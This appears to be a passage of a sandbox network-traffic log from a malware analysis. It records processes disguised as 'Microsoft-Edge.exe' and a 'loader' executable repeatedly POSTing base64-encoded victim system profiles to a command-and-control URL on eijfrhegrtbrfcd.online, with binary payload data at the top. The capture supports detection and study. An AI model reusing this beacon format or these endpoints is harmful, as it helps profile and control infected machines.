                                                                                                                                                                2024-09-27 15:42:33 UTC1369INData Raw: 89 42 21 bf 7e fa 20 9f 2d ea 50 0f 7c c0 bd 8b fc 8a f8 6a 10 72 03 46 a8 6a c4 5d fc ad 5f 4d e6 f2 b6 80 b9 25 fa 14 c9 6e 56 a4 67 46 6d 08 67 33 f3 9b ea ec 3b 84 a3 70 f0 5d f5 d7 b0 ad aa 23 28 3b d9 4d 33 a0 d5 e3 4c e5 b4 f5 6c d0 78 48 ed f4 90 4e f7 f2 77 95 9a e3 cb a7 9e 84 a5 2d 3b c0 32 77 ae 58 8e c0 62 c2 b2 0e e8 93 ef 40 84 c4 81 ff ef 79 79 c8 f2 27 0c 69 d7 18 0c 18 76 ac ac a1 25 83 53 1c 3e 92 18 cb 94 15 d4 e2 e5 a6 81 a1 0c e7 a0 5e 7d df f9 75 7d e3 5b a9 9d f4 54 eb 90 76 62 8f 52 0e 68 51 ed 73 2f d7 b9 94 50 40 90 03 fc bf 00 6b 4c a9 aa bd b8 cd 8b 06 19 a9 db c5 3b 16 41 e7 ca 82 a6 74 4f 76 2e ce 3e 82 49 ce ba 92 71 c2 10 7f ab 5d 99 02 12 c9 9d 35 b7 2d 98 bb 68 f0 c0 b2 42 6d f7 68 e6 54 f4 6d 05 7b 9d 44 b0 0e 25 ef ee
                                                                                                                                                                Data Ascii: B!~ -P|jrFj]_M%nVgFmg3;p]#(;M3LlxHNw-;2wXb@yy'iv%S>^}u}[TvbRhQs/P@kL;AtOv.>Iq]5-hBmhTm{D%
                                                                                                                                                                2024-09-27 15:42:33 UTC1369INData Raw: 58 39 1b 75 05 bf 2a 9f 03 f3 65 c0 a1 76 b2 ea 86 c1 44 7b e1 f4 2d 0e 85 b2 65 1a 4e e1 56 a4 fe 3c a6 f8 ae 95 50 2e 89 ac f5 22 93 20 19 af 23 19 da 04 1b ea 10 ff 96 fa 75 68 85 43 7d 66 39 db 1e 32 20 54 fb 65 8c 1d 45 68 c6 5f 99 b4 54 ae aa f9 20 66 46 57 21 2f e7 3d 4b f4 d9 30 57 66 9b 53 98 46 d2 ef 43 b2 ee 58 30 21 c7 23 5d 6d a3 d0 8e 17 78 a2 85 a1 b6 c5 e6 47 79 d5 45 ba f4 4a 8f 6c b9 14 4b 85 44 9d de 2a 80 2f e6 c8 08 52 6d 42 56 9f 82 3d 56 26 7d c9 48 c7 99 92 3a 2d 10 64 64 e8 f8 21 fe 18 5f 12 b3 92 fd 55 9f b8 41 28 15 cc 07 46 93 a7 69 97 46 f2 40 be 34 59 d3 91 59 26 d4 ef fc a6 94 b4 c1 1e 9f 1c b5 fb 2d 5f e6 0d 24 86 a8 22 c0 62 c2 7a 6a fa d5 f3 04 ec 11 5d 5c 83 14 9e 77 4c 5b da b6 fe 14 e8 b0 17 8e 7e 24 b0 88 5b d1 70 06
                                                                                                                                                                Data Ascii: X9u*evD{-eNV<P." #uhC}f92 TeEh_T fFW!/=K0WfSFCX0!#]mxGyEJlKD*/RmBV=V&}H:-dd!_UA(FiF@4YY&-_$"bzj]\wL[~$[p


Session ID: 36
Source IP: 192.168.2.4
Source Port: 49801
Destination IP: 172.67.187.100
Destination Port: 443
PID: 7636
Process: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:33 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:33 UTC | 664 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:33 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=opoP4DzuuwJpMkaclWY1KA9BQ2B7pKIC72rfAxxwTYiR8gSxiMBaGoygYnUm%2FtIYjAcUXgceSwiGCi%2Fwg5K%2BhKGjk9%2F1lYOiQHMuTHu0CRpv0m5x%2Ba0%2F5Amq%2Fq2%2BW9%2Bi61FxYtp2tpL4"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9ab11f3143d9-EWR
    alt-svc: h3=":443"; ma=86400
2024-09-27 15:42:33 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 37
Source IP: 192.168.2.4
Source Port: 49804
Destination IP: 172.67.187.100
Destination Port: 443
PID: 1748
Process: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:34 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:34 UTC | 626 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:34 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XdX%2FR2pWOAehTUolumMVOO3Qu0T3pvETWDH4f0QR%2FbfKjHLILjdI3ktliN7JazwHv7XTzXn9NW3%2BelMfk%2BlS7CBjr%2BCteVOzaHKvE7qm6ZFq3UJ5RC25JUgwWn0GxPtvEDlXWFhvnOrq"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9ab9fa294319-EWR
2024-09-27 15:42:34 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 38
Source IP: 192.168.2.4
Source Port: 49803
Destination IP: 172.67.187.100
Destination Port: 443
PID: 7636
Process: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:34 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:34 UTC | 620 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:34 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tW8eHXF8iB9%2B41UosqRhsgHIJCArfTt6rj2bvbt4QfGufB7G59AUM2m86JQeX%2BPXBxjH8wT4ogaoYS87OQXg2ZN7nRytKxT69iWphdeNc1UhDCJIdNR8JGL8UqzFUZcmVfzuOqfJuUW4"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9aba9aff42dc-EWR
2024-09-27 15:42:34 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 39
Source IP: 192.168.2.4
Source Port: 49806
Destination IP: 172.67.187.100
Destination Port: 443
PID: 1748
Process: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:35 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:36 UTC | 626 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:36 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AAerZ0r5LcCMa8H85PctN%2Bj4Rw7HdmzBTGgM3PxeZhzVoR5uir84L2BXyBVdjft5TgSsjzBOT8fVzYlTt%2BV9Qa1IGrAUkU%2BQkiFhkV58fXHp5%2FAGl1ZqyRzh%2BmKthOnoj3LlTkQijWxz"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9ac2ee6e420d-EWR
2024-09-27 15:42:36 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 40
Source IP: 192.168.2.4
Source Port: 49807
Destination IP: 172.67.187.100
Destination Port: 443
PID: 7636
Process: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:36 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:36 UTC | 626 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:36 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WfyMoPKsHoUR%2FZ9Vy%2FB9dISXeJCWmwn7csu9MNLGmDr6xJes4e3syjYzEL0Qf3Z0dSmX98x93kPxB7BKkmhb6vw%2B7coowFVwgbB9Z2NOFgVCPvRutTDW8KSIb83x1%2Bl%2FffNCgIGPxbRV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9ac3a9dc42ea-EWR
2024-09-27 15:42:36 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49810 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:37 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:37 UTC | 624 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:37 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sAZzTJ6FUfW8RFv9IoSJDO%2FEzGwW9Rnde7Tf0A8SLAJg81cAF3W%2FTbYP2wjAtorWuHdi%2BBPYvkjxh7ac7i94ZmnpsKAe7O25tLD8eArQWmBetS0a3W529qQCovLSCQ7XcZ%2FcEtLC5aJR"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9acb78897ca0-EWR
2024-09-27 15:42:37 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49811 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:38 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:38 UTC | 626 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:38 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OsTIREZjw%2B8RjiN%2Byp%2FHbIpVT3s70%2B0ctjjiqXXU3LKGSr6PpQRvT3a4qSO83ScIzJxujDGvZln2FDPgABeX5hLh9%2Fzy184WfhN4d6k6wWO8XJCuFQ5frQDeGxspvUzt4PeHqG1JXA7k"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9ad07e728c65-EWR
2024-09-27 15:42:38 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49813 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:38 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:38 UTC | 630 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:38 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uvr9C2t6iW01nY2wLaTxf2ohTQHM6Z%2FCXU%2Bigtf68wFOpHnnyiDHAZfHdAQ9%2B25mdJgOzsawdr4JxA4GAuSFJSzFx24H%2F4S0e97bs%2BJBlIAS95K%2FD3gABsK91YEMzElbMKnMyM3uM%2FLH"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9ad3af69433a-EWR
2024-09-27 15:42:38 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49815 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:39 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:39 UTC | 626 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:39 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2GtOA5hNFXPP764TvEcg5zpJDXYudw7hVKTFm65KQZmSF9Qx1teQc3Trm3wc9BZE2HjaKwr7%2BUvopZh41IlMXcgp%2B%2FSqPgfyBjIOjRyUl62xF%2B8XufqfQ%2Fd3D5UtIZbhqAFtY8iUGgo4"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9ada4ad50f46-EWR
2024-09-27 15:42:39 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49816 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:39 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:40 UTC | 620 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:40 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qJUQvwUHQTcHbqvOMv9u7RU5YeNimW6Pdi3pKtNuOPUWdUYMy88FeXh5wb80scjCe8pJVuaKwaJ4Xjq2S2AL9IJpNKtJXtYZxdCGtZ2BU1gdvkvmIhklg7qbezibyv%2Bad%2BUd1q7NTrck"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c9c9adbfebc431b-EWR
2024-09-27 15:42:40 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
    Data Ascii: 2
2024-09-27 15:42:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49818 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:41 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
    Connection: Keep-Alive
    User-Agent: A WinHTTP Example Program/1.0
    Content-Length: 0
    Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:41 UTC | 628 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 15:42:41 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-powered-by: PHP/8.0.30
    strict-transport-security: max-age=31536000;
    CF-Cache-Status: DYNAMIC
